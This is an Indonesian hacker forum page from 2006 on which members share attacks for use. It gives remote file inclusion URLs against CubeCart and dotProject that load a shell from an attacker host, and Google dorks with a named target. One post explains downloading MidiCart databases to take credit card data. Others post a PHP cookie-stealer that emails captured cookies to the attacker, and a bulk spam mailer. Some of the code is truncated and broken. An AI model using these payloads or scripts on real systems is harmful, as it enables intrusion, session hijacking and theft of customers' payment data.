WIDTH=1 HEIGHT=1>

(...habis....)

by:POM_PONK

Post by : POM_PONK on [ 18 February 2006 14:56:49 ]

CubeCart 3.0.6

bugs terdapat pada : includes/orderSuccess.inc.php

eksploitnya di :
http://www.target.com/includes/orderSuccess.inc.php?&glob=1&cartorderid=1&glob[rootDir]
=http://yourshellinject.com/inject.txt?

cara mencari target: google : “Powered by CubeCart 3.0.6″

google : “Powered by CubeCart 3.0.5″ google : “Powered by CubeCart 3.0.4″ etc,

next bugs:
Affected Products : CubeCart version 3.0.6 and prior Posted on 16 Feb 2006 by xippopdotProject
Remote File Inclusion file that vulnerable : “includes/dbadodb.php”, “includes/dbconnect.php”,
“includes/session.php”, “modules/admin/vwusrroles.php”, “modules/public/calendar.php” and
“modules/public/dateformat.php” how to exploit :
http://target/directory/includes/dbadodb.php?baseDir=http://yourshellinject.com/inject.txt?
http://target/directory/includes/session.php?baseDir=http://yourshellinject.com/inject.txt
http://target/directory/modules/admin/vwusrroles.php?baseDir=http://yourshellinject.com/inject.txt
http://target/directory/modules/public/calendar.php?baseDir=http://yourshellinject.com/inject.txt
google keyword : intitle:dotProject

dan kamu harus mengaktifkan cookies (cookies enabled)

Post by : Comex on [ 18 February 2006 09:24:17 ]

MidiCart Shopping Cart

MidiCart Shopping Cart

Berikut ini akan saya terangkan cara mengambil data dari "MIDICART"
dengan menggunakan Ms access.Kelemahan dari MIDIcART ini kita bisa mengambil informasi2
penting dari pengguna produk ini.

misalna (kartu kredit,nama,alamat dan lain sebagaina)

cara mencari target seperti biasa.

buka www.google.com search dengan kata kunci "ShoppingCart" (atau kreasi temen2 semua)

misal kita ambil contoh web ini:

http://someshope.com/shoppingdirectory/midicart.mdb <<<===== hanya contoh kalo webna dah

mati cari yg lain.

nah target diatas tinggal di ENTER maka akan keluar perintah download
klik save dan simpen di komputermu.

setelah itu buka Ms Access dan..... dan.... dan....cari apa yang kalian mau.
selamat mencoba

by:POM_PONK

#SOLOHACKERLINK allnet and dalnet

Post by : POM_PONK on [ 15 February 2006 16:13:19 ]

bug again....

hiks sebenernya malu aku mo kirim bug ini

soalnya yang laen yang kirim da pada master semua, tapi gak papa deh buat para newbie yok sama
sama belajar!

langsung aja buka om google

keyword: allinurl:/phplivehelper/ site: com
bug:/phplivehelper/initiate.php?abs_path=http://www.geocities.com/junlee_180/metro/yeyen.txt?

contoh target: http://livehelp.zyweb.com/live

menjadi:
http://livehelp.zyweb.com/live/phplivehelper/initiate.php?abs_path=http://geocities.com/junlee_180
/metro/yeyen.txt?

silahkan cari oiii

Post by : hikaru on [ 09 February 2006 23:48:19 ]

FBI [dot] Gov HijeCkinG

#!/usr/bin/python
#######################################################################
#
# Indonesian Newbie Class ( Resource Code )
# proxy grabber
# By iDiots http://idiots.madpage.com
#
# [email protected]
#
#######################################################################
# FBI [dot] Gov HijeckinG
#######################################################################
#
# Thank´s For all My Friend at #NeRaka #kartubeben #solohackerlink
# Pa n ma, My brother n siterzzzz
# Keluarga besar, My DD Jelex/Tari, Aini, teteh Tika n papa n mama (Terimakasih dah mau
ngangkat gw anak..)
#
#######################################################################

--------------------------- scriptzzz --------------------------------------------

<?
$datamasii=date("M d, Y");
if (isset($_REQUEST["id"]) && isset($_REQUEST["cookie"])){

$logcookie = $_REQUEST["cookie"];
$logcookie = rawurldecode($logcookie); //catat cookie ke bentuk text
$logemail = $_REQUEST["id"];
$logemail = rawurldecode($logemail); //catat logemail text

session_start();

$subyek="$logemail";
$pesan="$datamasii -- > $logemail $logcookie ";
$dari="From: iDiots<[email protected]>";

#disini bisa lo ganti ama email lo sendiri

mail("[email protected]",$subyek,$pesan,$dari);
mail("[email protected]",$subyek,$pesan,$dari);

#silahkan di ganti sama yang laen

header("Location: http://fbi.gov");

?>

--------------------------- scriptzzz --------------------------------------------

Dengan sCript ini gw udah pernah ngacak ngacak email na Netter yg katanya haCker juga email
email na anggota FBI :D

seperti: yogya family code, sincan2 (katanya kepala haCker Indonesia #malanghaCkerlink)

untuk penjelasan lebih lanjut akan di bahas di buku HTTP AttaCk II yg di terbitkan oleh Andi
Publisher. karangan anak anak #solohaCkerlink #kartubeben #NeRaKa

tunggu aja.....
(Ma´af kalo di anggal Spamer... kan boleh sekali sekali gw promosi... )

Ho...Ho..Ho..

--------------------------------
iDiots From Hell
http://idiots.Madpage.com

[email protected]
--------------------------------

Post by : iDiots on [ 07 February 2006 07:44:03 ]

Coding

#!/usr/bin/python
#######################################################################
#
# Indonesian Newbie Class ( Resource Code )
# proxy grabber
# By iDiots http://idiots.madpage.com
#
# [email protected]
#
#######################################################################
# CodinG
#######################################################################
#
# Thank¢¥s For all My Friend at #NeRaka #kartubeben #solohackerlink
# Pa n ma, My brother n siterzzzz
# Keluarga besar, My DD Jelex/Tari, Aini, teteh Tika n papa n mama (Terimakasih dah mau
ngangkat gw anak..)
#
#######################################################################

Dec Hex Code Dec Hex Code Dec Hex Code Dec Hex Code
0 00 NUL 32 20 space 64 40 @ 96 60 `
1 01 SOH 33 21 ! 65 41 A 97 61 a
2 02 STX 34 22 " 66 42 B 98 62 b
3 03 ETX 35 23 # 67 43 C 99 63 c
4 04 EOT 36 24 & 68 44 D 100 64 d
5 05 ENQ 37 25 % 69 45 E 101 65 e
6 06 ACK 38 26 $ 70 46 F 102 66 f
7 07 BEL 39 27 ¡® 71 47 G 103 67 g
8 08 BS 40 28 ( 72 48 H 104 68 h
9 09 HT 41 29 ) 73 49 I 105 69 i
10 0A LF 42 2A * 74 4A J 106 6A j
11 0B VT 43 2B + 75 4B K 107 6B k
12 0C FF 44 2C , 76 4C L 108 6C l
13 0D CR 45 2D - 77 4D M 109 6D m
14 0E SO 46 2E . 78 4E N 110 6E n
15 0F SI 47 2F / 79 4F O 111 6F o
16 10 DLE 48 30 0 80 50 P 112 70 p
17 11 DC1 49 31 1 81 51 Q 113 71 q
18 12 DC2 50 32 2 82 52 R 114 72 r
19 13 DC3 51 33 3 83 53 S 115 73 s
20 14 DC4 52 34 4 84 54 T 116 74 t
21 15 NAK 53 35 5 85 55 U 117 75 u
22 16 SYN 54 36 6 86 56 V 118 76 v
23 17 ETB 55 37 7 87 57 W 119 77 w
24 18 CAN 56 38 8 88 58 X 140 78 x
25 19 EM 57 39 9 89 59 Y 121 79 y
26 1A SUB 58 3A : 90 5A Z 122 7A z
27 1B ESC 59 3B ; 91 5B [ 123 7B {
28 1C FS 60 3C < 92 5C 124 7C |
29 1D GS 61 3D = 93 5D ] 125 7D }
30 1E RS 62 3E > 94 5E ^ 126 7E ~
31 1F US 63 3F ? 95 5F _ 127 7F DEL

--------------------------------
iDiots From Hell
http://idiots.Madpage.com

[email protected]
--------------------------------

Post by : iDiots on [ 31 January 2006 21:58:01 ]

iDiots PHP Mailer

#######################################################################
#
# Indonesian Newbie Class ( Resiurce Code )
#
# By iDiots http://idiots.madpage.com
#
# [email protected]
#
#######################################################################
# Weblog instal Bug
#######################################################################
#
# Thank´s For all My Friend at #NeRaka #kartubeben #solohackerlink
# Pa n ma, My brother n siterzzzz
# Keluarga besar, My DD Jelex/Tari, Aini, teteh Tika n papa n mama (Terimakasih dah mau
ngangkat gw anak..)
#
#######################################################################

<html>

<head>

<title>PHP Mail By iDiots</title>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

</head>

<body bgcolor="#FFFFFF" text="#000000">

<?

If ($action=="mysql"){

#Grab email addresses from MySQL

include "./mysql.info.php";

if (!$sqlhost || !$sqllogin || !$sqlpass || !$sqldb || !$sqlquery){

print "Please configure mysql.info.php with your MySQL information. All settings in this config file
are required.";

exit;

$db = mysql_connect($sqlhost, $sqllogin, $sqlpass) or die("Connection to MySQL Failed.");

mysql_select_db($sqldb, $db) or die("Could not select database $sqldb");

$result = mysql_query($sqlquery) or die("Query Failed: $sqlquery");

$numrows = mysql_num_rows($result);

for($x=0; $x<$numrows; $x++){

$result_row = mysql_fetch_row($result);

$oneemail = $result_row[0];

$emaillist .= $oneemail." ";

}
if ($action=="send"){

$message = urlencode($message);

$message = ereg_replace("%5C%22", "%22", $message);

$message = urldecode($message);
$message = stripslashes($message);
$subject = stripslashes($subject);

?>

<form name="form1" method="post" action="" enctype="multipart/form-data">

<br>

<table width="100%" border="0">

<tr>

<td width="10%">

<div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Your

Email:</font></div>

</td>

<td width="18%"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">

<input type="text" name="from" value="<? print $from; ?>" size="30">

</font></td>

<td width="31%">

<div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Your

Name:</font></div>

</td>

<td width="41%"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">

<input type="text" name="realname" value="<? print $realname; ?>" size="30">

</font></td>

</tr>

<tr>

<td width="10%">

<div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Reply-

To:</font></div>

</td>

<td width="18%"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">

<input type="text" name="replyto" value="<? print $replyto; ?>" size="30">

</font></td>
<td width="31%">

<div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Attach

File:</font></div>

</td>

<td width="41%"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">

<input type="file" name="file" size="30">

</font></td>

</tr>

<tr>

<td width="10%">

<div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-

serif">Subject:</font></div>

</td>

<td colspan="3"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">

<input type="text" name="subject" value="<? print $subject; ?>" size="90">

</font></td>

</tr>

<tr valign="top">
<td colspan="3"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">

<textarea name="message" cols="60" rows="10"><? print $message; ?></textarea>

<br>

<input type="radio" name="contenttype" value="plain" checked>

Plain

<input type="radio" name="contenttype" value="html">

HTML

<input type="hidden" name="action" value="send">

<input type="submit" value="Send Message">

</font></td>

<td width="41%"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">

<textarea name="emaillist" cols="30" rows="10"><? print $emaillist; ?></textarea>

<br>

<a href="?action=mysql">Load Addresses from MySQL</a></font></td>

</tr>

</table>

</form>
<?

if ($action=="send"){

if (!$from && !$subject && !$message && !$emaillist){

print "Please complete all fields before sending your message.";

exit;

$allemails = split(" ", $emaillist);

$numemails = count($allemails);

#Open the file attachment if any, and base64_encode it for email transport

If ($file_name){

@copy($file, "./$file_name") or die("The file you are trying to upload couldn´t be copied to the
server");

$content = fread(fopen($file,"r"),filesize($file));

$content = chunk_split(base64_encode($content));

$uid = strtoupper(md5(uniqid(time())));
$name = basename($file);

for($x=0; $x<$numemails; $x++){

$to = $allemails[$x];

if ($to){

$to = ereg_replace(" ", "", $to);

$message = ereg_replace("&email&", $to, $message);

$subject = ereg_replace("&email&", $to, $subject);

print "Sending mail to $to.......";

flush();

$header = "From: $realname <$from> Reply-To: $replyto ";

$header .= "MIME-Version: 1.0 ";

If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid ";

If ($file_name) $header .= "--$uid ";

$header .= "Content-Type: text/$contenttype ";

$header .= "Content-Transfer-Encoding: 8bit ";

$header .= "$message ";

If ($file_name) $header .= "--$uid ";

If ($file_name) $header .= "Content-Type: $file_type; name="$file_name" ";

If ($file_name) $header .= "Content-Transfer-Encoding: base64 ";

If ($file_name) $header .= "Content-Disposition: attachment; filename="$file_name" ";

If ($file_name) $header .= "$content ";

If ($file_name) $header .= "--$uid--";

mail($to, $subject, "", $header);

print "<b> --> Dah Di Kirim Bos..!!</b><br>";

flush();

?>

</body>

</html>
--------------------------------
iDiots From Hell
http://idiots.Madpage.com

[email protected]
--------------------------------

Post by : iDiots on [ 30 January 2006 22:50:57 ]